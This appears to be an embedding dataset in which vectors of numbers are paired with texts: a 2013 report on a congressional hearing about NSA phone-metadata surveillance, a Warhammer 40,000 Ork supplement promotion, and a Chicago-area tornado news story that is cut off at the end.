[ 0.048837121576070786, -0.13520754873752594, 0.006082164589315653, 0.0013387000653892756, 0.02644830010831356, -0.012257293798029423, 0.04260316118597984, 0.01314498670399189, 0.027990108355879784, -0.018374580889940262, -0.05541883409023285, 0.03831368312239647, -0.04845457524061203, 0.03721509873867035, -0.005526873283088207, 0.015579365193843842, 0.030416863039135933, -0.081917405128479, -0.04377947747707367, 0.026796141639351845, 0.009899086318910122, -0.028412116691470146, 0.039108894765377045, -0.012862162664532661, -0.030451450496912003, -0.0778365433216095, -0.10157743841409683, -0.028189411386847496, 0.06246146932244301, -0.03126118332147598, -0.07744953781366348, 0.09166385233402252, 0.0038610724732279778, 0.032082267105579376, -0.07030995935201645, -0.09276129305362701, 0.01377237867563963, -0.006726027466356754, -0.015850339084863663, 0.012369713746011257, 0.08356977999210358, 0.024778196588158607, 0.028748782351613045, 0.00410022446885705, 0.0034698466770350933, 0.05437425896525383, 0.020037556067109108, 0.05393042415380478, -0.0482119545340538, 0.08369120955467224, -0.1079784706234932, -0.01918286271393299, 0.03415443003177643, 0.02505248412489891, -0.020714987069368362, -0.0747426301240921, 0.011082313023507595, 0.019059913232922554, 0.013139361515641212, -0.0009802590357139707, -0.032268114387989044, -0.04757102578878403, -0.005674922373145819, 0.0026852921582758427, 0.014703354798257351, 0.02766362763941288, -0.07272659242153168, -0.030339162796735764, -0.03799430653452873, -0.015212111175060272, 0.01590579003095627, 0.005372929386794567, -0.025913143530488014, 0.07913392782211304, 0.0732504278421402, -0.07819495350122452, 0.08435983955860138, 0.062341123819351196, 0.004289585165679455, -0.0019642275292426348, 0.024827534332871437, -0.0008539627306163311, -0.0011960628908127546, 0.006480122916400433, -0.005764651577919722, -0.06599491089582443, -0.08447623252868652, -0.059647705405950546, 0.03263067081570625, 0.06570496410131454, -0.08728083968162537, -0.0051507954485714436, 0.03465352579951286, -0.010241039097309113, 0.09291360527276993, 0.03495318070054054, -0.0748656764626503, -0.044400010257959366, 0.04669828712940216, -0.02699156478047371, -0.03906307741999626, 0.07551093399524689, -0.003415293525904417, -0.07748191058635712, 0.002914683660492301, 0.035609081387519836, 0.03730582818388939, 0.11671419441699982, 0.08465346693992615, 0.09035712480545044, -0.05839157849550247, 0.014207670465111732, 0.023526400327682495, -0.0887395516037941, 0.010471769608557224, -0.09976668655872345, -0.06678609549999237, 0.03560514748096466, 0.11189941316843033, 0.0214423518627882, -0.06490566581487656, 0.12032715231180191, 0.006912956014275551, -0.10586219280958176, -0.006647505797445774, -0.031146284192800522, -0.09040143340826035, 4.17198740812169e-33, 0.04291597008705139, 0.04685880243778229, 0.01701696217060089, -0.06267335265874863, -0.002650872338563204, -0.019063979387283325, -0.0024975899141281843, 0.06658656150102615, -0.011876510456204414, -0.03663604333996773, -0.07416774332523346, 0.06637634336948395, -0.04059301316738129, 0.03550207242369652, 0.05487104877829552, 0.04312741756439209, 0.04414445534348488, -0.0016680904664099216, -0.05962427332997322, -0.047075189650058746, 0.045143432915210724, 0.0014732553390786052, -0.016912059858441353, -0.007177188526839018, -0.02399616874754429, -0.0873444452881813, -0.07392578572034836, 0.05757196992635727, -0.009898760356009007, 0.00016727401816751808, -0.04257529228925705, -0.006994288880378008, 0.006613234989345074, -0.02173430472612381, 0.050375644117593765, -0.005872289650142193, -0.04256191477179527, 0.026937434449791908, -0.004470271058380604, 0.0798238143324852, -0.09392303973436356, 0.0065417420119047165, -0.008088304661214352, -0.04571967199444771, -0.04282699525356293, 0.025657616555690765, -0.11305634677410126, -0.03522983193397522, 0.08943881839513779, 0.06660637259483337, 0.06466007232666016, 0.014946083538234234, -0.02479257620871067, 0.1027418002486229, -0.04311393201351166, 0.06315546482801437, -0.004464498721063137, 0.017589395865797997, -0.016763687133789062, 0.010627558454871178, -0.0036027422174811363, -0.06884215027093887, 0.06070828437805176, 0.0456007644534111, 0.015251509845256805, -0.001147634000517428, 0.0904124304652214, 0.03250018507242203, -0.05007470026612282, 0.041194647550582886, 0.007396692410111427, 0.007417486514896154, -0.04079437255859375, -0.026479920372366905, -0.06962528824806213, -0.03138305991888046, -0.022391237318515778, -0.008463246747851372, 0.02774873934686184, 0.05313923954963684, 0.028511328622698784, 0.05184300243854523, 0.00495606055483222, -0.05951569601893425, -0.092595174908638, 0.04651601240038872, 0.06213214248418808, -0.11217764019966125, -0.030544936656951904, 0.009942458011209965, -0.03373585641384125, -0.004584927577525377, -0.04386715963482857, 0.08079843968153, -0.05826554447412491, -4.2910892304309735e-33, -0.05981212109327316, -0.009340611286461353, 0.1038055419921875, 0.023021098226308823, -0.12550954520702362, 0.019166087731719017, 0.07348400354385376, -0.07075745612382889, 0.02079630084335804, 0.037318259477615356, -0.025573136284947395, -0.017429392784833908, 0.023121269419789314, 0.005935252644121647, -0.020786140114068985, 0.03388209640979767, 0.13706684112548828, -0.06957986950874329, -0.017762688919901848, -0.02898297645151615, 0.025591952726244926, 0.0210995152592659, -0.17099185287952423, 0.023199867457151413, 0.014905334450304508, -0.03357978165149689, 0.005780661478638649, 0.03955279290676117, 0.02330327033996582, 0.015982642769813538, -0.003108283504843712, 0.016047600656747818, 0.009093649685382843, -0.03547801822423935, 0.009553864598274231, 0.08559027314186096, 0.02155183255672455, -0.018972164019942284, -0.016123460605740547, -0.00651929434388876, 0.009508554823696613, -0.028873056173324585, -0.004664573818445206, 0.026940349489450455, -0.006711914669722319, 0.1073785126209259, -0.09491657465696335, 0.04886526241898537, 0.0023416674230247736, 0.012990094721317291, 0.06672348082065582, 0.023638498038053513, 0.004949450492858887, 0.038070198148489, -0.0346829891204834, 0.007769647054374218, -0.023323705419898033, 0.05275417119264603, -0.0029042379464954138, -0.014912424609065056, 0.013189702294766903, 0.07284396141767502, -0.08448866009712219, -0.0013266602763906121, -0.04568837583065033, 0.04258618876338005, 0.04527752846479416, -0.029975609853863716, -0.08802077919244766, -0.007892928086221218, -0.014476086013019085, 0.020870499312877655, -0.015200195834040642, -0.041802212595939636, -0.12121382355690002, 0.04621526971459389, 0.09599995613098145, 0.009673552587628365, -0.07703249901533127, -0.014922276139259338, 0.032015763223171234, 0.02338578924536705, 0.06168089807033539, -0.039072372019290924, 0.019603155553340912, -0.011635907925665379, 0.019199518486857414, -0.04164426401257515, -0.09727614372968674, -0.0017874084878712893, -0.008066289126873016, -0.05864420905709267, -0.1128094345331192, -0.04729003831744194, -0.0651174783706665, -5.62472557419369e-8, -0.03734324499964714, -0.015897881239652634, -0.03434452414512634, 0.0441959910094738, 0.036641884595155716, 0.05897919461131096, 0.04709199070930481, 0.12499319016933441, -0.06939170509576797, 0.02158394642174244, -0.0021337855141609907, -0.027138106524944305, -0.034862540662288666, 0.019248170778155327, 0.05748315528035164, 0.01080404780805111, -0.03959687799215317, -0.15476910769939423, 0.02013600990176201, -0.06654398888349533, -0.053575050085783005, 0.01706071011722088, 0.02309984527528286, -0.031028015539050102, 0.0476076602935791, 0.013108990155160427, 0.016324523836374283, 0.06896109133958817, 0.0041748168878257275, 0.050639644265174866, -0.02867910824716091, -0.0014581050490960479, -0.03042403608560562, -0.030173635110259056, 0.01739366166293621, 0.028525741770863533, 0.0011820608051493764, -0.03202224150300026, -0.01116007100790739, 0.03705059736967087, 0.06252530962228775, 0.06637772172689438, 0.084964819252491, 0.011090796440839767, -0.005699296481907368, 0.017290180549025536, -0.06055935472249985, 0.0254693441092968, 0.08375118672847748, -0.07061615586280823, 0.01180677767843008, -0.021238557994365692, 0.045521676540374756, 0.08427399396896362, -0.02222788892686367, -0.016028059646487236, -0.023976491764187813, -0.026212001219391823, -0.0035759080201387405, 0.09663373976945877, 0.11857805401086807, -0.008920625783503056, 0.029111595824360847, 0.07065106928348541 ]
Think of it this way. Let's say the government suspects you are a terrorist and it has access to your Facebook account. If you're an American citizen, it can't do that currently (with certain exceptions)—but for the sake of argument. So all of your friends, that's one hop. Your friends' friends, whether you know them or not—two hops. Your friends' friends' friends, whoever they happen to be, are that third hop. That's a massive group of people that the NSA apparently considers fair game. For a sense of scale, researchers at the University of Milan found in 2011 that everyone on the Internet was, on average, 4.74 steps away from anyone else. The NSA explores relationships up to three of those steps. (See our conversation with the ACLU's Alex Abdo on this.) Inglis' admission didn't register among the members of Congress present, but immediately resonated with privacy advocates online. 3 hops! That's a LOT OF DATA as my FISA/surveillance people know. A LOT. — Spencer Ackerman (@attackerman) July 17, 2013 Do the math: Your whole contact list. All their contact lists. All THOSE people's contact lists. That's a LOOOT of people. #FISAOvesight — Julian Sanchez (@normative) July 17, 2013 @normative If you don't want to share your contact lists with the government, maybe you just shouldn't know people. — Jon Henke (@JonHenke) July 17, 2013 The hearing was far more critical of the government than previous hearings have been. Members of the House from both political parties had strong words for the agency representatives, often focused on how the letter of the law had been exploited. Ranking Minority Member John Conyers (MI): "You've already violated the law in my opinion." Rep. Jerry Nadler (NY): "I believe it's totally unprecedented and goes way beyond the statute." Rep. Ted Poe (TX): "Do you see a national security exemption in the Fourth Amendment? … We've abused the concept of rights in the name of national security." The author of the Patriot Act, Jim Sensenbrenner of Wisconsin, reminded the government that the act was up for renewal in 2015. The provisions for phone metadata collection, he warned, have "got to be changed … otherwise in a year or year and a half you're not going to have it any more." Inglis' admission isn't likely to help the effort to convince members of the House that the surveillance programs should be kept as is. Neither will a response offered by DNI counsel Robert Litt. Asked by committee chairman Bob Goodlatte if the government really thought the massive collection of phone records could be kept from the American people, Litt replied, "Well, um, we tried." The audience chuckled. Update, 1:10 p.m.: Another bit of news. The longstanding question of whether or not phone metadata collected by NSA includes geolocation data has been answered. "We are not collecting that data," Inglis said, "under this program." Photo: Inglis is sworn in. (AP) This article is from the archive of our partner The Wire.
[ -0.06568700075149536, -0.05749371275305748, -0.054256621748209, -0.04108911752700806, 0.0678718313574791, -0.012288046069443226, 0.08385485410690308, 0.023117106407880783, 0.040487345308065414, 0.005534078925848007, 0.04317718744277954, 0.06889219582080841, 0.09401680529117584, -0.02829989418387413, -0.0038570731412619352, 0.014334904961287975, 0.030027950182557106, -0.06942780315876007, -0.1431315541267395, -0.014005963690578938, -0.07414036989212036, -0.0432155467569828, 0.12489841133356094, -0.003579608164727688, -0.02877047471702099, -0.010422316379845142, -0.013312747702002525, -0.06151743233203888, -0.10541198402643204, 0.012910927645862103, 0.09672211855649948, 0.05265689268708229, 0.0018243178492411971, 0.08872055262327194, 0.010361135937273502, -0.075031578540802, 0.049053411930799484, 0.012321222573518753, 0.03752543404698372, -0.009202812798321247, 0.023801589384675026, -0.07275757193565369, 0.030416542664170265, 0.060823261737823486, -0.020612597465515137, 0.051829393953084946, -0.008637935854494572, 0.08930514752864838, -0.05970437079668045, -0.04839414358139038, -0.05127512663602829, 0.04428528621792793, 0.041002292186021805, 0.11496677994728088, 0.014976654201745987, -0.051446910947561264, -0.01833358220756054, -0.016632666811347008, -0.00095359020633623, 0.0296445582062006, -0.048564642667770386, -0.10014738887548447, 0.02320864424109459, 0.010755522176623344, 0.0036815691273659468, 0.03614717349410057, -0.02229735441505909, 0.00017668915097601712, 0.05160688981413841, -0.0031092416029423475, 0.0351298525929451, 0.067594513297081, 0.009717115201056004, 0.07646535336971283, 0.057140957564115524, -0.05081605538725853, 0.08446595817804337, 0.03142521157860756, -0.0067699989303946495, -0.0016032528365030885, 0.06532435119152069, 0.03982502222061157, 0.0623386912047863, 0.006346501410007477, -0.0003222291124984622, -0.03901977464556694, -0.07425867766141891, -0.03235245868563652, -0.039687369018793106, 0.05451042577624321, -0.07512491941452026, 0.09547847509384155, 0.03832991048693657, -0.013361143879592419, 0.04712941125035286, 0.004235061351209879, 0.07804915308952332, -0.011450310237705708, -0.032413505017757416, 0.039313964545726776, -0.08498355746269226, 0.011232440359890461, -0.011732826940715313, -0.03152506425976753, -0.019600193947553635, 0.029415078461170197, 0.031701792031526566, 0.009023180231451988, 0.009756311774253845, 0.09606852382421494, 0.016246750950813293, -0.055447887629270554, -0.012097986415028572, -0.012526294216513634, 0.07102968543767929, -0.08158537745475769, 0.04658922180533409, 0.09638131409883499, 0.01963651552796364, 0.013059074990451336, -0.009368767030537128, 0.11170274019241333, 0.03278343752026558, 0.005838570185005665, -0.044000253081321716, -0.01983104646205902, -0.06648939102888107, 4.505331892075967e-34, -0.0030601948965340853, 0.08126077800989151, -0.05895178020000458, -0.036192480474710464, -0.09026996791362762, 0.006519831717014313, -0.12593074142932892, 0.02098064124584198, 0.015522435307502747, 0.1067146360874176, -0.016421496868133545, 0.02299424633383751, 0.06652998924255371, 0.050474781543016434, 0.06706321984529495, 0.04490441083908081, -0.03575754538178444, 0.04626833647489548, -0.013863812200725079, 0.018862972036004066, 0.12665961682796478, -0.11373335123062134, -0.025766463950276375, 0.032423026859760284, 0.0035700593143701553, -0.01725860685110092, -0.009870270267128944, 0.007647617254406214, 0.07501507550477982, -0.021361012011766434, -0.03684636205434799, 0.06756294518709183, 0.028777483850717545, 0.002635815180838108, 0.09343727678060532, 0.0363646037876606, 0.04219254106283188, -0.034120358526706696, 0.0005737594910897315, 0.020190821960568428, -0.03833496943116188, 0.06447307765483856, 0.027543339878320694, -0.04163378104567528, -0.048796359449625015, 0.022915130481123924, -0.05885513126850128, -0.04211165010929108, -0.058292537927627563, -0.009903540834784508, 0.0093202730640769, 0.032768432050943375, -0.012491017580032349, 0.025166159495711327, -0.08558576554059982, 0.026929398998618126, -0.052525728940963745, -0.023828545585274696, 0.062222134321928024, 0.030886048451066017, -0.003904379205778241, 0.009566016495227814, -0.08645101636648178, -0.008530805818736553, -0.0480174720287323, -0.014528311789035797, -0.009898034855723381, 0.03009064681828022, 0.016371209174394608, 0.049607593566179276, 0.044973086565732956, 0.04048281908035278, -0.05657482519745827, -0.02216309681534767, -0.06647543609142303, -0.005996611900627613, 0.007068177685141563, 0.057275354862213135, 0.004892364144325256, -0.03142493590712547, 0.002361007733270526, 0.017526162788271904, 0.08224931359291077, -0.00974065437912941, -0.07762051373720169, -0.025652213022112846, -0.0015117471339181066, -0.000612087722402066, -0.017623620107769966, 0.09204429388046265, -0.018275387585163116, -0.04081663116812706, -0.02257620356976986, 0.07786225527524948, -0.09225770831108093, -1.737336569477185e-33, -0.09511616826057434, -0.030780568718910217, -0.01393972709774971, -0.048643484711647034, 0.005285649094730616, -0.04655597358942032, 0.018573328852653503, 0.004322743974626064, 0.023252051323652267, 0.03900549188256264, -0.073543980717659, -0.007916045375168324, 0.09038231521844864, 0.015601113438606262, 0.04902653768658638, 0.043112363666296005, 0.0964357852935791, -0.019016919657588005, 0.0007850152323953807, -0.060935378074645996, 0.029389329254627228, -0.04635700583457947, -0.0543384775519371, -0.001411111792549491, 0.02755117416381836, -0.025127273052930832, 0.06781194359064102, -0.08157876133918762, 0.04965446516871452, 0.0173310749232769, 0.03954100236296654, -0.04070103168487549, -0.04480034485459328, 0.003152853576466441, -0.04637344181537628, 0.02757701836526394, -0.030440988019108772, 0.028739862143993378, -0.043135449290275574, -0.05884714797139168, -0.05194464698433876, 0.09672807902097702, -0.13028906285762787, -0.05092804133892059, -0.13001945614814758, 0.09603051096200943, 0.013968118466436863, 0.06081440672278404, -0.07798130065202713, -0.06220248341560364, -0.007318770047277212, 0.020214872434735298, 0.03842565789818764, 0.013453198596835136, -0.04907626658678055, 0.0018268882995471358, 0.033912479877471924, 0.0008394838077947497, 0.09001372754573822, -0.060850199311971664, 0.024242866784334183, 0.02753133326768875, -0.10458788275718689, 0.013381607830524445, 0.00265122321434319, -0.051862433552742004, -0.030166205018758774, -0.052308354526758194, 0.0014285821234807372, 0.0595758855342865, 0.0027368308510631323, -0.08401960134506226, -0.0811772271990776, -0.08992520719766617, -0.005436609499156475, 0.022076565772294998, 0.0013591023162007332, -0.013286535628139973, -0.11146049946546555, 0.037229109555482864, 0.005725888069719076, -0.008334973827004433, 0.03244869410991669, -0.06123483553528786, 0.05490517243742943, 0.010126283392310143, 0.06655185669660568, 0.026181602850556374, -0.04535038396716118, 0.04118349403142929, 0.004986451473087072, -0.07105329632759094, -0.08706497400999069, -0.01500875037163496, -0.07115744054317474, -5.666679214755277e-8, 0.01934058405458927, -0.01350442599505186, 0.0008636638522148132, 0.05750972405076027, 0.022894199937582016, 0.09026684612035751, 0.03052479960024357, 0.023480230942368507, -0.025136930868029594, -0.007446888368576765, 0.03479461371898651, -0.046378664672374725, -0.03934694826602936, 0.022693809121847153, 0.1001729816198349, 0.02495719864964485, 0.009532728232443333, -0.07832147926092148, 0.026152275502681732, 0.06559514999389648, -0.11268296837806702, -0.03203166648745537, -0.0806778073310852, -0.023670099675655365, 0.012449221685528755, 0.031639810651540756, -0.021104352548718452, -0.04792100563645363, -0.0009548690868541598, 0.07875549048185349, -0.10230057686567307, -0.0425395667552948, -0.012070707976818085, -0.004888249095529318, -0.004416521638631821, 0.02026260830461979, -0.022064803168177605, -0.02577575482428074, 0.009856058284640312, 0.007138566114008427, 0.017273103818297386, -0.027348527684807777, 0.0995301678776741, 0.047578614205121994, 0.011908668093383312, -0.014180225320160389, -0.06502488255500793, -0.08538908511400223, 0.06744793057441711, -0.026290684938430786, 0.008301867172122002, -0.12225020676851273, 0.017089160159230232, 0.04072772338986397, 0.07350175827741623, 0.01130354218184948, 0.02794342301785946, 0.003545873798429966, -0.026034371927380562, -0.025708716362714767, 0.03910783678293228, -0.05091477558016777, -0.06785743683576584, -0.003459013532847166 ]
The Ork ‘Decurion’ pieces are starting to come out – Come see the latest formations that fit in the Ork Jig-saw puzzle! via Captain Citadel, 2-25-2016 via Games Workshop Here is where these formations will fit in the Ork “decurion” detachment we saw earlier in the week: via hordrak On dakkadakka We now have a pretty good picture of how this all fits together. The Waaagh-Band is the new “greentide” replacement and then you take the Council of the Waaagh to get Ghaz and his crew. Sprinkle in some other formations like the Dakkajets or Painboy mob and you’ve got your self a big green wrecking ball. Digital Edition $32.99 Waaagh Ghazghkull – a Codex: Orks Supplement is your complete guide to Ghazghkull’s crusade. Inside you will find the full background tale of the rise of the greatest Ork Warlord to ever stomp across the galaxy. As well as rules for fielding an army worthy of Ghazghkull in your games of Warhammer 40,000, you will find a lavish showcase demonstrating the impressive range of models, as well as colours and icons of the many units and formations fighting in the warlord’s force. DESCRIPTION It has long been said that should the disparate Orks ever unify beneath one leader they would crush all of the so-called civilised peoples of the galaxy. That doomsday draws nearer, for the great greenskin Warlord Ghazghkull Thraka has arisen, and Orks from all clans muster to his bellowing warcry. He is not just a mighty warrior, but a master strategist and the living Prophet of Gork and Mork – the brutal greenskin gods. Already star systems burn upon his orders, and more will soon follow. Ghazghkull has called the Great Waaagh!, drawing towards him the most warlike of his savage race. Goff warbands, Speed Freeks, Dread Mobz – all have crossed the stars in their seething multitudes to join the greatest Ork crusade in a millennium. This time, nothing will stop the green tide. In this book you will find: A comprehensive history of Ghazghkull Thraka, his battle to become supreme amongst the greenskins, and his wars against the Imperium A showcase of incredible Ork Citadel Miniatures A brand new detachment with which to build your Ork army: the Great Waaagh!-band 14 formations that can be used in any Ork horde Special rules, Warlord Traits and Kustom Gubbinz unique to Waaagh! Ghazghkull forces 3 Altar of War missions and 6 Tactical Objectives that provide you with new ways to battle with your Waaagh! Ghazghkull army Ghazghkull will be back soon, and he’s brining all the ladz with him this time. Drop it in the comments if you’re an Ork expert and can help us figure out what’s new and what’s not! We’re da best. Think diffrent do ya? Come and have a go then, ya runty little wimp!
[ -0.14923247694969177, 0.13256458938121796, -0.017409441992640495, -0.056127335876226425, -0.04210972040891647, -0.06572125107049942, -0.04221402481198311, 0.03933717682957649, -0.03389616310596466, 0.029519984498620033, -0.013058259151875973, -0.07357116788625717, 0.03220368176698685, 0.022331973537802696, 0.03146231546998024, 0.01893204264342785, 0.0012766750296577811, 0.041069649159908295, -0.042444270104169846, -0.006604536436498165, -0.026083912700414658, 0.003314461326226592, 0.008791091851890087, -0.0012290487065911293, -0.03453914076089859, 0.001528591150417924, -0.047866884618997574, 0.053803179413080215, -0.0088174007833004, -0.0892011746764183, 0.010144256055355072, -0.017981454730033875, -0.09015659987926483, 0.05528564006090164, -0.010131746530532837, 0.0820717066526413, 0.02396661415696144, -0.02880040556192398, -0.03704441711306572, 0.04329302906990051, 0.050952378660440445, 0.024257812649011612, -0.006140661891549826, 0.013902981765568256, 0.014539504423737526, -0.0017955305520445108, -0.09317340701818466, 0.03483441472053528, -0.003161437576636672, 0.012093192897737026, -0.0017617946723476052, -0.06352254003286362, 0.039779502898454666, 0.04924117028713226, 0.09151329100131989, -0.07856278866529465, -0.00994427502155304, -0.01653928868472576, -0.012453346513211727, -0.03850161284208298, -0.00323122669942677, -0.03379364684224129, -0.04176031053066254, -0.008727334439754486, -0.08004142343997955, -0.03083955869078636, 0.04292381554841995, 0.0229659304022789, 0.020935911685228348, 0.05280335247516632, -0.0026114305946975946, 0.01966281421482563, 0.024957114830613136, -0.0031339023262262344, -0.07764793932437897, 0.05497251823544502, 0.006717689801007509, 0.05542689561843872, 0.00467564957216382, -0.08358486741781235, 0.06724084913730621, 0.030725382268428802, 0.020395739004015923, 0.03236283361911774, -0.031000565737485886, -0.0500117689371109, -0.009675728157162666, 0.04629954695701599, 0.0679202601313591, 0.005826939363032579, 0.012415320612490177, 0.018923666328191757, 0.03488044813275337, 0.04713334143161774, 0.029724175110459328, 0.04585214704275131, 0.0065509965643286705, 0.03588416799902916, -0.0375211238861084, 0.027876436710357666, 0.016886740922927856, -0.057463694363832474, -0.015813186764717102, -0.0741315558552742, -0.025006376206874847, -0.01546015776693821, -0.028766334056854248, 0.04414617270231247, -0.02837778627872467, -0.06352610141038895, -0.047201260924339294, 0.009972924366593361, -0.007249081507325172, 0.0019288489129394293, -0.06312159448862076, 0.05748403072357178, -0.04901176691055298, 0.02728443220257759, -0.06638699024915695, -0.013314357027411461, 0.03280333802103996, -0.0831698328256607, -0.015760038048028946, 0.05138885974884033, 0.03907889500260353, 0.05580911040306091, -0.02569344826042652, 5.5715570634916145e-33, 0.06239589303731918, 0.03198382258415222, -0.023279784247279167, -0.037325553596019745, 0.011263502761721611, -0.02803182788193226, 0.023851200938224792, -0.0075041200034320354, -0.02422827109694481, 0.014635530300438404, -0.006683571729809046, 0.019468003883957863, -0.05866585299372673, 0.02630101703107357, -0.03004591539502144, -0.15447232127189636, -0.04554583132266998, 0.009768840856850147, -0.13419705629348755, 0.025720711797475815, 0.07424310594797134, 0.03416116163134575, -0.048085808753967285, -0.022317834198474884, 0.059783682227134705, 0.06825101375579834, -0.011839530430734158, -0.035513605922460556, -0.002319249091669917, 0.034368909895420074, -0.014439386315643787, -0.06835723668336868, -0.0647197738289833, 0.0071312482468783855, -0.02479422837495804, -0.0023051570169627666, -0.11941684782505035, -0.09338794648647308, -0.05395032837986946, -0.04853271692991257, 0.01816077157855034, -0.07921499758958817, -0.1758270412683487, 0.007137164939194918, 0.021166998893022537, 0.008074804209172726, 0.016799751669168472, 0.077808678150177, -0.024793189018964767, -0.035567015409469604, 0.013230538927018642, 0.058902110904455185, -0.07020553201436996, 0.004839754197746515, -0.017813628539443016, -0.05069904401898384, 0.05758215859532356, -0.05075892433524132, 0.03489721566438675, -0.04187263920903206, 0.0845680832862854, -0.029958538711071014, -0.002308742143213749, 0.06772108376026154, -0.031854402273893356, -0.052553482353687286, -0.05976409092545509, 0.023158812895417213, -0.06102979555726051, 0.00750880828127265, 0.021632486954331398, -0.05095941573381424, -0.001785576925612986, -0.026293788105249405, 0.021182525902986526, -0.034292902797460556, 0.04782453179359436, 0.06654869765043259, -0.06671009957790375, -0.03849933296442032, -0.0096090417355299, 0.09159611165523529, -0.08417703211307526, -0.06615619361400604, -0.049058400094509125, 0.049759119749069214, 0.07727450877428055, -0.0732763260602951, -0.010646152310073376, 0.01880660653114319, -0.08824622631072998, -0.046908099204301834, 0.0643986314535141, -0.057982806116342545, -0.014772320166230202, -5.783689345434897e-33, 0.05883954092860222, 0.010760387405753136, 0.01924390159547329, 0.02133769541978836, 0.11994531750679016, 0.04854115843772888, 0.062014028429985046, 0.10740526020526886, 0.04549163207411766, -0.010561460629105568, -0.03023454360663891, 0.07952215522527695, -0.0219186469912529, 0.015655338764190674, 0.04559847339987755, 0.005648870021104813, 0.018074169754981995, 0.09941078722476959, 0.0359930582344532, -0.03230944275856018, 0.05355903133749962, -0.015586798079311848, 0.05452857166528702, -0.005372065119445324, 0.04814703390002251, 0.09655239433050156, 0.02223961241543293, -0.008632526732981205, -0.02599916234612465, 0.08565402776002884, -0.007148297503590584, -0.009979396127164364, -0.0035784398205578327, 0.033113062381744385, -0.005369833204895258, 0.016005106270313263, 0.030011456459760666, 0.011126632802188396, -0.05766682326793671, -0.03284482657909393, -0.044321779161691666, 0.019800009205937386, -0.05375846475362778, 0.06681094318628311, -0.06609032303094864, -0.005787810776382685, -0.030972251668572426, 0.04987106844782829, -0.07561946660280228, 0.005644519347697496, 0.013269789516925812, 0.070160873234272, 0.030872654169797897, 0.027040237560868263, -0.02789395861327648, 0.10732152312994003, -0.07264073193073273, -0.051363505423069, -0.02660417929291725, -0.004750195890665054, -0.04237586259841919, -0.004919631406664848, -0.02436535619199276, 0.09034429490566254, -0.009215419180691242, 0.021347390487790108, 0.03218970447778702, 0.05108330026268959, -0.0656709372997284, 0.02453613467514515, -0.1483372151851654, -0.016785871237516403, -0.04268733412027359, -0.013285302557051182, 0.04208124801516533, 0.06247368082404137, -0.06680721044540405, -0.035382337868213654, -0.006808512844145298, -0.0046805767342448235, -0.061737652868032455, 0.05245125666260719, -0.030166827142238617, 0.04870733991265297, 0.04716552793979645, 0.0806543380022049, -0.00033617205917835236, 0.11397182196378708, -0.014790574088692665, 0.04695658013224602, 0.01301038358360529, -0.038525450974702835, 0.08646794408559799, 0.16071757674217224, 0.11306896805763245, -5.8465523977702105e-8, -0.038904402405023575, 0.09970631450414658, -0.00361114670522511, 0.06502250581979752, 0.04564787819981575, -0.06952709704637527, -0.03734996169805527, -0.03611989691853523, -0.0550202839076519, 0.03882203623652458, 0.06946337223052979, 0.002569844014942646, 0.003515759250149131, 0.009616068564355373, -0.011744808405637741, 0.012227865867316723, -0.019232867285609245, -0.09994438290596008, -0.04651736468076706, -0.016752691939473152, 0.014148090034723282, -0.060422662645578384, 0.051548924297094345, 0.04836432635784149, -0.03410312905907631, 0.1312313675880432, -0.056212399154901505, -0.015942981466650963, -0.005098792724311352, 0.09291626513004303, 0.020399797707796097, 0.04649852588772774, -0.04274553060531616, 0.008878856897354126, 0.0465669259428978, 0.050855062901973724, -0.10029208660125732, 0.01613602414727211, 0.03568375110626221, 0.005120968911796808, -0.04337548464536667, 0.027355095371603966, 0.09783490747213364, 0.08706463128328323, 0.0005760986241512001, -0.0566009096801281, -0.03543199971318245, -0.11322848498821259, -0.04464004933834076, 0.021209198981523514, 0.02377905696630478, -0.002920701401308179, -0.03359600529074669, 0.04285863786935806, 0.015854932367801666, 0.04481137543916702, -0.07597671449184418, 0.020389167591929436, -0.03242693096399307, 0.05590515211224556, 0.03876108303666115, -0.09569200873374939, 0.05550679937005043, 0.013106798753142357 ]
Crews are working to clear fallen trees and downed power lines in the city and suburbs after heavy storms swept through the area. The National Weather Service confirmed a tornado touched down in Lake County. funnel cloud was spotted around 9 p.m. Sunday in Grayslake. NWS said a preliminary survey finds that the EF-1 tornado was on the ground for 7.5 miles. The tornado's track began in Round Lake, continued through Hainesville and Grayslake, and ended in Wildwood. Winds of between 90 to 100 mph were recorded. The maximum width of the tornado's track was around 300 yards.This was the first tornado to hit Lake County since 2002."All of a sudden whish, whish. Then everybody hit the floor," Johnny Scott said.Several roofs were damaged, including that of Grayslake Central High School, where the dugout was blown across the street and field equipment was tossed around. Part of the school's roof landed in the choir teacher's front yard."As you can see, our wonderful tree caught it," Jenny White said. "So I want to keep this tree. I love this tree. I hope we can save it. It saved us."No one was injured in Grayslake, but there was property damage."Everybody was concerned that the tree would fall into the house. But God was merciful, and you saw all the branches that did break," Loretha Scott said. Next door, Jeffrey Goldsmith's vehicles were damaged."Three or four vehicles were dented and wiped out a bunch of trees torn off, thrown over here," Goldsmith said. "It's just terrible."Stuff was flying in the air. A car was very shaken, very badly, trying to hold on to that thing. Barricades from construction were flying in the air. And no sooner had it started than it stopped," Sgt. Scott Heimus, Grayslake Police Department, said."By the time everything was over, I came out, and the tree that was two feet from the sunroom was totally uprooted," Theresa Talbert, resident, said.The storms cut a four to five mile path of destruction and damaged about half a dozen buildings from Round Lake to Wildwood."We've had sirens go off many times before. And you never think it's going to be as bad as it is. This is terrible," Alison Dalton said.A new skate park was also tossed around, landing near the swimming pool across the street."I thought these were really planted in the ground, but apparently they're not. It must have been really strong to move all these big ramps," Michael Knapik said.Despite the damage, the school plans to open on time next week.In nearby Round Lake, a popular restaurant was destroyed and several homes were damaged . But no one was injured.No one was injured in Chicago, but the storms uprooted trees in Rogers Park and Edgewater on the city's North Side."The tree coming down, the damage from that, is moderate to extensive. It'll take a while for them to clean this up," Dick Thomas said.More than 500 calls were made to 911, city officials said, during the storm."We remove the trees from property, meaning it's on your property, on your house, your business. We also clear the streets. Once we do that, we move on to things like this one, that is partially blocking the street," Commissioner Charles Williams, Chicago Streets and Sanitation, said.Hail damage was also reported."I have about six holes about this big in a bunch of my screens from hail ripping through them. I've never had that happen before," Beth Jones said.At the height of the storm, about 120,000 ComEd customers were without power.As of 9 p.m., about 3,600 people remain without power, mainly in Lake County, and will be restored once crews have safely secured the downed trees. ComEd set up a mobile unit in Grayslake to help customers and make sure crews are ready to go to areas as soon as they're given the OK.The final day of Lollapalooza, one of Chicago's biggest music festivals, ended about 30 minutes early because of severe weather. A few of Sunday's final acts, including Florence and the Machine, had to shorten their performances."It's better to be safe than sorry. And they made a call. And they did it appropriately. And the good news is we, obviously, on the 11th year Lollapalooza, and they practice for emergencies, weather-related. And they were prepared," Mayor Rahm Emanuel said. Grant Park was 